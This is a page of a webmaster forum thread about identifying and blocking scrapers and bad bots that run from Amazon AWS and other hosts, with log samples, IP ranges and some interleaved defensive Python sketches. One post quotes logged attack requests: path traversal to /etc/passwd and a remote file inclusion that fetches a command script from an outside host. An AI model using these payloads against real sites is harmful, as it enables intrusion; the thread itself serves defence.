
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

This 88-message thread spans 3 pages; this is page 3.
Amazon AWS Hosts Bad Bots

 12:45 am on Sep 30, 2011 (gmt 0)

1.) Back in 2008, I noticed a lot of bad bots hailing from amazonaws.com and by January, 2009, I started a thread about what hid behind that early cloud:

amazonaws.com plays host to wide variety of bad bots [webmasterworld.com...]

Since that time, 270-plus reports/messages further document that the Amazon AWS Host name and Amazon AWS's countless IPs continue to be what forum mod IncrediBILL aptly termed:


This thread continues the saga of amazonaws.com and its spawn.

2.) The AWS cesspool is home to countless hundreds of bots, the vast majority of which ignore robots.txt. Home to hundreds more bots cloaked as regular UAs. Home to infected machines and bad programming, and all the ills to others that cloud anonymity affords.

And in recent weeks, home to bots with no UA at all... [webmasterworld.com...] Note the double-quotes at the end where a UA, or at least a hyphen, should be:

ec2-50-17-87-218.compute-1.amazonaws.com - - [00/Sep/2011:00:00:00] "GET /dir/filename.html HTTP/1.1" 403 1471 "-" ""

Today, the 'blank bot' -- what I've started thinking of as the AWSbot -- was the most frequent AWS 'visitor' to my main site. Four Hosts, four hits to different files, four 403s. robots.txt? NO
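For anyone who wants to spot these blank-UA requests in their own logs, here's a minimal sketch (mine, not from the thread) that parses a combined-format line and flags a final quoted field that is truly empty — not even the customary hyphen. The pattern is simplified and assumes well-formed lines:

```python
import re

# Combined-log pattern: host, identd, user, [time], "request", status,
# bytes, "referer", "user-agent" -- a simplified sketch, not a full parser.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def is_blank_ua(line):
    """True when the user-agent field is completely empty -- not even '-'."""
    m = LOG_RE.match(line.strip())
    return bool(m) and m.group('agent') == ''

line = ('ec2-50-17-87-218.compute-1.amazonaws.com - - [00/Sep/2011:00:00:00] '
        '"GET /dir/filename.html HTTP/1.1" 403 1471 "-" ""')
```

Running `is_blank_ua(line)` on the sample above returns `True`; a line ending in a normal quoted UA returns `False`.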



 8:28 pm on Apr 4, 2012 (gmt 0)

Block every IP range belonging to Amazon

Are you guys just blocking using IP Deny in shared hosting or quick deny in the Firewall on a VPS server?

About the ranges, is /24 the one that includes the entire range?

I see some people using /18, /15..etc?



 8:54 pm on Apr 4, 2012 (gmt 0)

Are you guys just blocking using IP Deny in shared hosting or quick deny in the Firewall on a VPS server?

Different people here use different methods, although I don't ever recall any "special" method being described for VPS.

About the ranges, is /24 the one that includes the entire range?

I see some people using /18, /15..etc?

The forward slash and the number that follows it are CIDR notation for IP ranges. How large a range the slash-number (/n) covers depends on what precedes it — and the smaller the number after the slash, the larger the range.

There are numerous CIDR tools across the www.
There's a wiki page on CIDR which will assist you.
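To make that concrete, here's a quick sketch (not from the thread) using Python's stdlib ipaddress module on documentation-reserved example addresses — the smaller the number after the slash, the bigger the block:

```python
import ipaddress

# The /n suffix fixes the first n bits of the address; the remaining
# 32 - n bits are free, so a block holds 2**(32 - n) addresses.
for cidr in ('192.0.2.0/24', '192.0.0.0/18', '192.0.0.0/15'):
    net = ipaddress.ip_network(cidr)
    print(cidr, 'holds', net.num_addresses, 'addresses')
```

So no, /24 is not the one that includes "the entire range": of the three it is the smallest, covering only the final octet (256 addresses), while /18 holds 16,384 and /15 holds 131,072.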


 7:46 pm on Apr 5, 2012 (gmt 0)

I generally block IPs using a custom-built trapping system, since I use IIS.

If an IP range gets really troublesome I add the range (or part of it) to the IIS Directory Security restrictions list. I have had to do this with a few amazon ranges.

If you have htaccess (linux/unix and some IIS servers) then use that.


 9:11 pm on Apr 5, 2012 (gmt 0)

What's IIS ;)
Might you provide a URL that shows examples of denying access in IIS?


 8:56 pm on Apr 6, 2012 (gmt 0)

I'm sure you know that IIS is the MS Windows web server. :)

A URL - short answer is no. The simple demo is to try accessing one of our sites from a blocked IP/UA; the complex answer is that it's too complex to describe easily, and there is a security risk in making the information available.


 10:07 pm on May 29, 2012 (gmt 0)

Just stopping by to add:

Pinterest/0.1 +http://pinterest.com/

robots.txt? NO

FWIW: Went for an .html file, no graphics.

(Aside: I grew so, SO weary of resource-wasting, robots.txt-ignoring AWS bots, I started adding AWS CIDRs to an iptables block. Now when new CIDRs appear, they simply await their date with killfile destiny. Muaha-ha;)
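The killfile idea in that aside — check each visitor against a list of blocked CIDRs — can be sketched in a few lines. The CIDRs below are documentation-reserved examples, not real AWS ranges:

```python
import ipaddress

# Hypothetical killfile -- documentation-reserved ranges, NOT real AWS CIDRs.
KILLFILE = [ipaddress.ip_network(c)
            for c in ('203.0.113.0/24', '198.51.100.0/24')]

def is_killed(ip):
    """True when the address falls inside any blocked CIDR."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in KILLFILE)
```

In practice you'd feed the matching ranges to iptables (or your firewall of choice) rather than check them per request in application code.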


 3:33 pm on May 31, 2012 (gmt 0)

A biggie... - (
Amazon Technologies Inc.
Amazon AWS Network Operations
Registered late last year, some sub-ranges modified within the past month or so.

Two hits on my server today, widely separated within the 54.247/16 range - sub-listed as ...

54.247/16 - Amazon Web Services, Elastic Compute Cloud, EC2

... a limited spot-check on other /16 ranges does not give that.


 5:59 pm on May 31, 2012 (gmt 0)

fwiw, my notes say Amazon Technologies at 224-239 followed by AWS at 240-255, so you could probably go the whole /11.

Matter of fact, are there any humans in 54/8 at all? IANA says the whole thing belongs to Merck, whatever that means. That is, ahem, I know who Merck is, but I don't know if they're subletting to ISPs, or if people are cruising the web on company machines...
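For what it's worth, that 224-through-255 span really does collapse to a single /11: 32 contiguous /16s is 2^21 addresses. A quick check (mine, not from the thread) with Python's stdlib ipaddress:

```python
import ipaddress

# 32 contiguous /16s (54.224.x.x through 54.255.x.x) summarize to one /11.
nets = list(ipaddress.summarize_address_range(
    ipaddress.ip_address('54.224.0.0'),
    ipaddress.ip_address('54.255.255.255')))
print(nets)  # [IPv4Network('54.224.0.0/11')]
```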


 9:23 pm on May 31, 2012 (gmt 0)

Thanks, Lucy. Didn't notice that one! :)

The idea of a "company" owning a complete /8 isn't new. Level3, psinet... Both of those are troublesome but seem to have a few humans around to confuse matters. Then there's IBM, AT&T...


 8:06 pm on Jun 10, 2012 (gmt 0)

I thought this might be a useful read, since it mentions amazon's cloud and how it can be used to crack passwords.

"The exponential growth in computing power described by Moore's Law and the advent of massive pools of elastic computing power in cloud based pools like Amazon's EC2 have broken down the walls that used to make passwords protected by hashing algorithms like SHA-1 and MD-5 all but unbreakable."


A good reason to block amazon-based bots from any of your password-protected sites. Sooner rather than later one of those bots may turn out to be a cracker. And to uprate the password hashing, of course. :)


 8:23 pm on Jun 10, 2012 (gmt 0)

Here's why you should also block all requests with http: or ../ in either the path or the query string parameters.

All in the same second:
2012-nn-nn nn:nn:nn 78.46.74.nn 403 /search.php?page=../../../../../../../../../etc/passwd%00 <unknown referer> Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Geck
2012-nn-nn nn:nn:nn 78.46.74.nn 403 /search.php?page=../../../../../../../../../etc/passwd <unknown referer> Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Geck
2012-nn-nn nn:nn:nn 78.46.74.nn 403 /search.php?page=http://www.examplehotel.com.br/cmd3.txt?&cmd=id <unknown referer> Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Geck
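The blocking rule described above — refuse any request carrying `../` or `http:` in the path or query string — can be sketched like this (my sketch, not the poster's actual filter). Decoding first also catches percent-encoded variants:

```python
import re
from urllib.parse import unquote

# Traversal (../) or remote-inclusion (http:/https:) markers anywhere in
# the decoded path-plus-query are grounds for an immediate 403.
SUSPECT = re.compile(r'\.\./|https?:', re.IGNORECASE)

def should_block(path_and_query):
    return bool(SUSPECT.search(unquote(path_and_query)))
```

All three logged attempts above would trip this check; an ordinary `/search.php?page=2` would not.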


 8:40 pm on Jun 10, 2012 (gmt 0)

hetzner/your-server.de -


 9:16 pm on Jun 10, 2012 (gmt 0)

Where "Hetzner" = "shoot first and ask questions afterward" ?

grandma genie

 8:09 pm on Jul 2, 2012 (gmt 0)

All these came in the other day, June 25, and all with the same UA, but different IPs, most are from Amazon. Now all blocked:

209.9.228.nnn - - "GET / HTTP/1.0" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Beyond The Network America, PullThePlug Technologies LLC
176.34.222.nn - - "GET /example HTTP/1.0" 301 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Amazon Data Services Ireland Ltd
204.236.186.nnn - - "GET /example HTTP/1.0" 200 26468 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" us-west-1.compute.amazonaws.com
177.71.186.nn - - "GET /example HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" sa-east-1.compute.amazonaws.com Brazil
67.217.160.nn - - "GET /example HTTP/1.0" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Hostname: place.holder ISP Latisys-Ashburn, LLC Ashburn, VA
67.217.165.nn - - "GET /example HTTP/1.0" 200 22675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" same as above
67.217.168.nnn - - "GET /example HTTP/1.0" 200 838 "mywebsiteurl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" same as above
175.41.156.nn - - "GET /example HTTP/1.0" 200 22917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ap-southeast-1.compute.amazonaws.com Singapore
50.112.42.nn - - "GET /example HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" us-west-2.compute.amazonaws.com
50.57.168.nnn - - "GET /example HTTP/1.0" 200 28011 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Hostname: static.cloud-ips.com Rackspace Hosting
184.73.73.nnn - - "GET /example HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" compute-1.amazonaws.com Ashburn, VA
175.41.198.nnn - - "GET /example HTTP/1.0" 200 210463 "mywebsiteurl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ap-northeast-1.compute.amazonaws.com

I've listed behind the UA who they are and where they are from. What were they doing? Scraping...


 12:19 pm on Dec 9, 2012 (gmt 0)

I have all my htm and js files gzip-compressed on the server.
My provider does not implement "expand compressed file if client does not support gzip delivery".

So I implemented in .htaccess a redirect for non-gzip-capable clients.

Now I discovered this discussion, because nearly the only visitors on the redirected pages are amazonaws spiders.

There are two possible reasons a client wants the uncompressed content:

1.) It cannot handle gzip and is therefore redirected
2.) It arrives via a link from somebody with problem 1

To eliminate point 2, my system now redirects everything back to the compressed content if HTTP_ACCEPT_ENCODING contains gzip.

It seems AmazonAWS is the only spider not able to understand gzip.
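The negotiation step that poster describes — serve the precompressed file only when HTTP_ACCEPT_ENCODING advertises gzip — might look like this in outline (a sketch with made-up filenames, not the actual .htaccess rules):

```python
def pick_variant(accept_encoding):
    """Return the precompressed variant only when the client accepts gzip.

    'page.html' / 'page.html.gz' are placeholder filenames. Real servers
    also honour q-values and '*' entries; this sketch ignores them.
    """
    encodings = [token.split(';')[0].strip().lower()
                 for token in (accept_encoding or '').split(',')]
    return 'page.html.gz' if 'gzip' in encodings else 'page.html'
```

A client sending `Accept-Encoding: gzip, deflate` gets the .gz variant; a bot sending nothing at all gets the plain file — or, per the posts that follow, a block.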


 2:33 pm on Dec 9, 2012 (gmt 0)

First visit from this bot = -

184.169.242.xxx - - [08/Dec/2012:22:51:33 -0800] "GET /robots.txt HTTP/1.1" 200 440 "-" "SkimBot/1.0 (skimlinks[dot]xxx <dev@skimlinks[dot]xxx>)"


 6:40 pm on Dec 9, 2012 (gmt 0)

Seems AmazonAWS is the only spider not able to understand gzip.

Is it possible that you've misunderstood this thread and/or Amazon AWS?

Amazon AWS is NOT a solitary spider representing Amazon; rather, it's a horde of rogue, unidentified crawlers that Amazon sells server space to.
Each of those crawlers is only as capable as its own software.
Rejecting clients that lack gzip capability is one method of stopping these cut-rate crawlers.


 9:43 pm on Dec 9, 2012 (gmt 0)

gzip isn't the only compression method used by web browsers and other agents, although it is the most common.

Non-encoded content is sometimes requested by legitimate non-browsers or browser accessories such as anti-virus tools, which often cannot manage compressed files (it takes time to decompress them, which slows down the final browser view).

It is quite possible that desirable but small-time bots may not handle compression.

And as wilderness points out, it isn't a single amazon bot but dozens (or possibly hundreds!) of non-amazon bots using amazon cloud space.


 9:19 pm on Mar 27, 2013 (gmt 0)

I thought Amazon (and google) blockers may be interested in these extracts from today's Threatpost dot com article "U.S. and Russia--Not China--Lead List of Malicious Hosting Providers"

"...the appearance of Amazon in the top 10 list of providers hosting the highest concentration of infected Web sites. These are the kind of sites used in drive-by download attacks and to deliver exploits from exploit packs. Amazon, with more than two million IPs, ranks fourth in the list of providers hosting infected sites. Also on that list is Google, which comes in at number seven. The top spot belongs to Mail.ru, a Russian hosting provider."

The gist of the article is that "...if you're looking for the most malicious hosting providers on the Web, you won't find any of the top 10 in China. In fact, the United States and Russia have many more bad hosting providers in the top 20 than China does."

"...phishing sites ... four of the top 10 hosting providers being located in America."

Admittedly most of this is aimed at windows/mac/mobile desktop visitors, not web site hosts, but remember: they have to get new servers from somewhere and we are amongst the targets!


 10:03 pm on Mar 27, 2013 (gmt 0)

@ dstiles

Point taken and agreed with, however I think the differentiating terms here are "Malicious Hosting Providers."

According to my logs, an increasing amount of "malicious" activity comes from China IPs, just not traceable to "hosting providers." Most of these bad agents show as Chinanet or gov't owned properties. The lack of transparency is the real issue, so the entire country of China may be getting the blame.

In other parts of the world bad activity can be traced to individual companies & hosting providers.

I continue to block every China IP range I know of. Makes my job so much easier.


 9:03 pm on Mar 28, 2013 (gmt 0)

My view on this is:

Chinese hits are very often broadband-based, hence either a local (small-scale) server or (more likely) part of a botnet - individually the bandwidth is low but lots of machines make it higher. This is a scenario not constrained to China but operating in all countries to a greater or lesser degree.

Why China? As with several under-capitalized and anti-capitalist societies, there are a lot of pirated copies of windows in use. Pirated copies are not updateable through MS - they refuse access for updating (or at least used to - no current info). The result is a lot of very vulnerable operating systems which are easily compromised.

My hope is pinned, in China, on the Chinese version of Ubuntu they are supposed to be promoting. If the average person there runs Linux (which is free) there is a very much lower chance of those machines getting viruses - Linux is much more difficult to infect than either Windows, Mac or (eg) Android.

What I was posting about was the criminals themselves using AWS, G and lots of other clouds as Command & Control (C&C) servers but mostly about them being the hosting servers for web sites that serve up the viruses - botnets can't do that very well unless they include genuine high-bandwidth servers in their net to host the web sites (and where is the easiest place to get those now? Right...). The clouds are fair game: they are easy to install sites on to serve viruses and other compromising software.

Latest mention today is Evernote, which is being used to share C&C information around botnets and to then store the stolen data en route to the criminals' own system.

Given such use of clouds and the fact that before very long there will certainly be a report of a cloud data-breach, anyone for using a cloud to store their own data?

As an aside: Spamhaus has been hit by DDoS attacks three times greater than those directed at US banks. From China? Russia? Nope. From Cyberbunker in Netherlands - another prime source of badness. Cyberbunker have a bad reputation for spamming as well as providing hosting for the infamous Russian Business Network.


 3:45 am on Apr 2, 2013 (gmt 0)

New Amazon range (at least for me) -


 7:36 pm on Apr 2, 2013 (gmt 0)

I thought I'd made a big mistake when I checked I had that one. I had the IP range blocked from 54.224 to 54.255!

Turns out I was correct. Amazon holds the IP range: -


 1:02 am on Apr 3, 2013 (gmt 0)

Well, that would make sense - then it spans the 2 I have: - -


 6:48 pm on Apr 3, 2013 (gmt 0)

I've had the problem of split-range before but never on such a scale. :)

Nowadays I check ranges either side of newly-tagged ranges (server and dsl) to see if they occupy a larger range but this is certainly the largest "server farm" range I've seen.


 3:23 pm on Apr 16, 2013 (gmt 0)

And this is an extension to that range...

NetRange: -
OrgName: Amazon Technologies Inc.

NOTE: This is not necessarily cloud but I'm blocking it on principle.


 4:49 pm on Apr 16, 2013 (gmt 0)

Thanks dstiles, I agree


 11:07 pm on May 16, 2013 (gmt 0)

This thread was started 2 years ago and stuff changes.

I'm locking it as we need to start a new AWS thread.

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved